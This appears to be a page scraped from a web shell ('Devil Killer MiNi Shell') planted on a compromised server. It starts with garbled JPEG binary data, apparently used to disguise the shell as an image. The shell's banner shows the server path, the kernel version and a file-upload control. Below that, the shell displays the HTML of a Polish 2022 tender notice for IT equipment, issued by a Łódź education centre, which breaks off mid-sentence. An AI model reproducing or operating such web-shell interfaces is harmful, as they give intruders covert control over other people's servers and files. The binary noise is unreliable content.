JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220712/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220712/0025101401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu IT w ramach projektu : „Zmotywowani i wykwalifikowani” (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM KSZTAŁCENIA ZAWODOWEGO I USTAWICZNEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365274690</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stefana Żeromskiego 115</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-542</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 637 72 78</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cez.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cez.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu IT w ramach projektu : „Zmotywowani i wykwalifikowani” (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c46d30db-01d7-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00251014</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00172281/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 dostawa sprzętu IT</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Zmotywowani i wykwalifikowani” współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cezlodz.bip.wikom.pl/wpis/dostawa-sprzetu-it-w-ramach-projektu-zmotywowani-i-wykwalifikowani-wspolfinansowanego-przez-unie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu MiniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej sekretariat@cez.lodz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty elektroniczne składane są<br/>przez Wykonawcę za pośrednictwem Formularza dokomunikacji<br/>jako załączniki. Sposób sporządzenia dokumentów elektronicznych musi być zgodny zwymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.wsprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dladokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzieleniezamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu MinistraRozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowychoraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy(Dz. U.z2020 poz. 2415).c) Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „Formularz do<br/>złożenia, zmiany, wycofania oferty lub wniosku” oraz do: „Formularza do komunikacji”,d) Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu MiniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej ePUAP,e) Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz„Formularza do komunikacji” wynosi 150 MB,f) Za datę przekazania oferty, wniosków,<br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP,g) Identyfikator<br/>postępowania i link dla danego postępowania o udzielenie zamówienia dostępne są na liście<br/>wszystkich postępowań na MiniPortalu, klikając wcześniej opcję„Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja zamawiającego (administratora) o przetwarzaniu danych osobowych<br/>(Wykonawcy) - Klauzula informacyjna z art. 13 Rozporządzenia Ogólnego o Ochronie Danych Osobowych (RODO) związana z<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>1. Informacja zamawiającego (administratora) o przetwarzaniu danych osobowych (Wykonawcy) - Klauzula informacyjna z art. 13<br/>Rozporządzenia Ogólnego o Ochronie Danych Osobowych (RODO) związana z postępowaniem o udzielenie zamówienia<br/>publicznego.<br/>2. Administratorem danych osobowych jest Centrum Kształcenia Zawodowego i Ustawicznego w Łodzi, (ul. Stefana Żeromskiego<br/>115, 90-542 Łódź), e-mail: sekretariat@cez.lodz.pl, reprezentowany przez Dyrektora.<br/>3. W sprawach ochrony danych osobowych można się kontaktować z Inspektorem ochrony danych: e-mail:<br/>rafal.bieniek@cez.lodz.pl. Dane dotyczące inspektora podane są na stronie internetowej:<br/>https://cezlodz.bip.wikom.pl/strona/ochrona-danych-osobowych.<br/>4. Przetwarzanie danych osobowych odbywa się w związku z pełnieniem przez Dyrektora obowiązków kierownika zamawiającego w<br/>postępowaniach o udzielenie zamówienia publicznego na rzecz Miasta Łodzi w związku z realizacją zadań powierzonych jednostce.<br/>5. Przetwarzania danych osobowych odbywa się na podstawie przepisów prawa:<br/>5.1 art. 6 ust. 1 lit. c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony<br/>osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE w celu związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>5.2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), zwaną dalej PZP.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP.<br/>7. Zgodnie z art. 222 ust. 5 PZP dane wykonawców uczestniczących w postępowaniu przetargowym są udostępniane na stronie BIP,<br/>tak jak ogłoszenie o wykonaniu umowy na podstawie art. 448 PZP.<br/>8. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 1 PZP, a także podmioty upoważnione na podstawie i w granicach prawa oraz podmiotom, z<br/>którym Administrator Danych Osobowych zawarł umowę powierzenia przetwarzanie danych oraz odbiorcy danych w rozumieniu<br/>przepisów o ochronie danych oświadczące usługi pocztowe, kurierskie, usługi informatyczne.<br/>cd w kolejnym polu - w tym polu - brak miejsca</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9. Dane osobowe będą przechowywane do czasu niezbędnego do realizacji zadań, o<br/>których mowa w pkt 3, a następnie przekazywane do archiwum zakładowego i tam przechowywane odpowiednio:<br/>9.1 dokumentacja z postępowania o udzielenie zamówień publicznych - zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas obowiązywania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas obowiązywania umowy;<br/>9.2 dokumentacja z postępowania o udzielenie zamówień publicznych na zadania realizowane z dofinasowaniem ze środków Unii<br/>Europejskiej - przez okres wymagany przez Instytucję Zarządzającą danym programem operacyjnym skąd pozyskano środki.<br/>10. Każdy ma prawo do dostępu do swoich danych osobowych, ich poprawiania oraz prawo żądania ograniczenia przetwarzania.<br/>Prawo do przenoszenia danych oraz prawa wniesienia sprzeciwu wobec przetwarzania danych osobowych (tym samym prawo do<br/>usunięcia danych) z uwagi na konieczność wywiązywania się z obowiązków przewidzianych w PZP oraz dla celów ustalenia,<br/>dochodzenia lub obrony roszczeń oraz celów archiwalnych nie przysługuje.<br/>11. Każdy ma prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie jego<br/>danych osobowych jest niezgodne z przepisami o ochronie danych osobowych.<br/>12. Dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>13. Z obowiązkiem informacyjnym dotyczącym przetwarzania danych osobowych w ramach realizacji Projektów można zapoznać się<br/>pod adresem internetowym https://cezlodz.bip.wikom.pl/strona/ochrona-danych-osobowych.sobowym, podmioty</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/ZIW/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem niniejszego zamówienia jest dostawa sprzętu IT : <br/>Lp.	Nazwa	Liczba sztuk<br/>1	Przenośny komputer wraz z systemem operacyjnym	1<br/>2	Monitor interaktywny	1<br/><br/>3.2.	Zamawiający opisał przedmiot zamówienia w dokumencie pn. Opis przedmiotu zamówienia (OPZ) stanowiącym załącznik nr 3 do niniejszej SWZ. <br/>3.3.	Wspólny słownik zamówień (CPV):<br/>Główny kod CPV<br/>30236000-2 – różny sprzęt komputerowy <br/><br/>Pozostałe kody CPV<br/>Kody CPV<br/>30213100-6 Komputery przenośne<br/>30237200-1 Akcesoria komputerowe<br/>48000000-8 Pakiety oprogramowania i systemy informatyczne<br/>48760000-3 Pakiet oprogramowania do ochrony antywirusowej <br/>30231320-6 Monitory dotykowe </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30237200-1 - Akcesoria komputerowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48760000-3 - Pakiety oprogramowania do ochrony antywirusowej</p> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami:<br/>1) C - cena - 60%<br/>Przy dokonywaniu oceny ofert Zamawiający będzie stosował następujące zasady:<br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max<br/>• C – liczba punktów otrzymanych w danym kryterium<br/>• W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>• X min – najniższa wartość w danym kryterium spośród złożonych ofert<br/>• X obliczana – wartość obliczanej oferty w danym kryterium.<br/>2) D – wydłużenie okresu gwarancji i rękojmi - 40%<br/>Minimalny okres gwarancji i rękojmi udzielonej przez Wykonawcę na dostarczony sprzęt wynosi 3 lata<br/>W przypadku wydłużenia ww. okresu o kolejne miesiące Wykonawca otrzyma:<br/>- 6 miesięcy – 5 pkt<br/>- 12 miesięcy – 15 pkt<br/>- 24 miesiące - 40 pkt<br/>UWAGA:<br/>W przypadku braku zaznaczenia konkretnego kwadratu w Formularzu oferty lub zaznaczeniu więcej niż jednego kwadratu –<br/>wówczas Zamawiający przyjmie, że wykonawca deklaruje minimalny okres gwarancji i rękojmi określony w OPZ i tym samym w tym<br/>kryterium otrzyma 0 punktów.<br/>Maksymalnie można uzyskać 40 pkt.<br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą<br/>liczbę punktów.<br/>Zamawiający przyjmuje że: 1 pkt = 1 %<br/>P = C + D<br/>gdzie:<br/>P – łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium cena<br/>G – ilość punktów badanej oferty w kryterium wydłużenie okresu gwarancji i rękojmi.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W postępowaniach o<br/>wartości mniejszej niż progi unijne zamawiający, w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w<br/>postępowaniu żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.<br/>2.1 W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022r., poz. 835):<br/>2.1.1. Z postępowania o udzielenie zamówienia wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006r.<br/>dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz.Urz.<br/>UE L 134 z 20.05.2006r. z późn. zm.), zwanego dalej „rozporządzeniem 765/2006”, i rozporządzeniu Rady (UE) nr 269/2014 z dnia<br/>17 marca 2014r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną,<br/>suwerenność i niezależność Ukrainy lub im zagrażających ( Dz.Urz. UE L 78 z 17.03.2014r. z późn. zm.), zwanego dalej<br/>„rozporządzeniem 269/2014”, albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o<br/>ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/>art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości<br/>(Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany<br/>na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego.<br/>2.1.2. Wykluczenie następuje na okres trwania okoliczności określonych w pkt. 2.1.1.<br/>2.2. Zamawiający zastrzega sobie również możliwość weryfikacji braku zaistnienia ww. podstaw wykluczenia w stosunku do konkretnego podmiotu za pomocą wszelkich dostępnych środków. Jako przykład takich metod weryfikacji można wskazać chociażby<br/>ogólnodostępne rejestry takie jak Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności Gospodarczej czy<br/>Centralny Rejestr Beneficjentów Rzeczywistych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Wraz z ofertą, w celu potwierdzenia, że oferowane dostawy spełniają określone przez Zamawiającego wymagania, cechy<br/>określone przez zamawiającego, Wykonawca zobowiązany jest złożyć następujące przedmiotowe środki dowodowe:<br/>Informacje (np. katalogi, karty, specyfikacje, prospekty, ulotki, instrukcje użytkowania) nt. parametrów oferowanego towaru,<br/>potwierdzające zgodność z przedmiotem zamówienia, określonym w Opisie przedmiotu zamówienia. Prosimy o zaznaczenie<br/>na poszczególnych dokumentach/plikach, której pozycji dane karty / instrukcje/ specyfikacje one dotyczą.<br/>2. Jeżeli wykonawca nie złoży powyższych przedmiotowych środków dowodowych lub złożone środki dowodowe będą<br/>niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienie w wyznaczonym terminie.<br/>3. Zamawiający nie będzie wzywał wykonawców do złożenia lub uzupełnienia przedmiotowych środków dowodowych ,<br/>jeżelipomimo ich złożenia oferta wykonawcy podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>4.4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków 